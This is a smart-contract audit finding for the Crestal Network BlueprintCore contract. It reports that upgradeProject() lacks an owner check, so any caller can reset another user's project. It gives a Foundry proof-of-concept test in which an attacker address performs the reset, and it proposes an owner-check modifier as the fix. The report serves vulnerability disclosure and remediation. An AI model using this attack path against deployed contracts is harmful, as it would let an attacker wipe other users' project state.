Wild Champagne Griffin

Medium

# Anybody can reset an existing project.

### Summary

missing projectId creator/owner check in upgradeProject(). This missing check can cause an attacker to reset any created project

### Root Cause

In upgradeProject() - https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198

The function has a modifier hasProject(projectId) - https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L165-L173, this modifier only checks if the projectId passed to the upgradeProject() has been added to the contract state and not if the person reseting a project is the one that sets it.

This allows existing projects to be reset incase of any issue, abnormalities, etc.

### Internal Pre-conditions

1. user1 sets a new projectId with a proposal request using createProjectIDAndProposalRequest() 
OR
1. user1 sets a new projectId with a deployment request using createProjectIDAndDeploymentRequest()

### External Pre-conditions

None

### Attack Path

1. the attacker calls upgradeProject() with any projectId to reset project state.

### Impact

The protocols will suffer revenue loss, as users will get tired and possible leave the protocol as their project state can be reset after paying gas to create project, proposal, deployment etc.

### PoC

Add the following test function in BlueprintV5.t.sol and then run "forge test test/BlueprintV5.t.sol"


`
        

       function test_resetProjectByAnyUser() public {
        string memory base64Proposal = "test base64 proposal";
        string memory serverURL = "http://example.com";
        address attacker = vm.addr(1);

        // Generate the signature
        (bytes memory signature, address signerAddress) = generateSignature(projectId, base64Proposal, serverURL);

        // Add the payment address
        blueprint.addPaymentAddress(address(mockToken));

        // set zero cost for create agents, use any number less than 0
        blueprint.setCreateAgentTokenCost(address(mockToken), 0);

        // Expect the createAgent event
        vm.expectEmit(true, false, true, true);
        emit BlueprintCore.CreateAgent(projectId, "fake", signerAddress, 0, 0);

        // Create agent with token
        blueprint.createAgentWithTokenWithSig(
            projectId, base64Proposal, workerAddress, serverURL, address(mockToken), signature
        );


        vm.startPrank(attacker);
        blueprint.upgradeProject(projectId);

        (address solver, bytes32 requestProposalID,) = blueprint.getProjectInfo(projectId);

        assertEq(requestProposalID,"");
    }
`

The above test will show that any user can reset any existing project state.

### Mitigation

in https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L50-L55

add a new variable - address projectOwner

When setting a new project, in this logic - https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L178-L179

modify it to:
```solidity
Project memory project =
            Project({id: projectId, requestProposalID: 0, requestDeploymentID: 0, proposedSolverAddr: dummyAddress, projectOwner: userAddr});
```

This will set the project owner.

Then add a modifier called isProjectOwner(bytes32 projectId) after https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L163

```solidity
modifier isProjectOwner(bytes32 projectId, address userAddr) {
        // check project id owner
        require(projects[projectId].projectOwner == userAddr, "not projectId owner");
        _;
    }
```

then modify upgradeProject() - https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L198

To

    function upgradeProject(bytes32 projectId) public hasProject(projectId) isProjectOwner(projectId, msg.sender) { }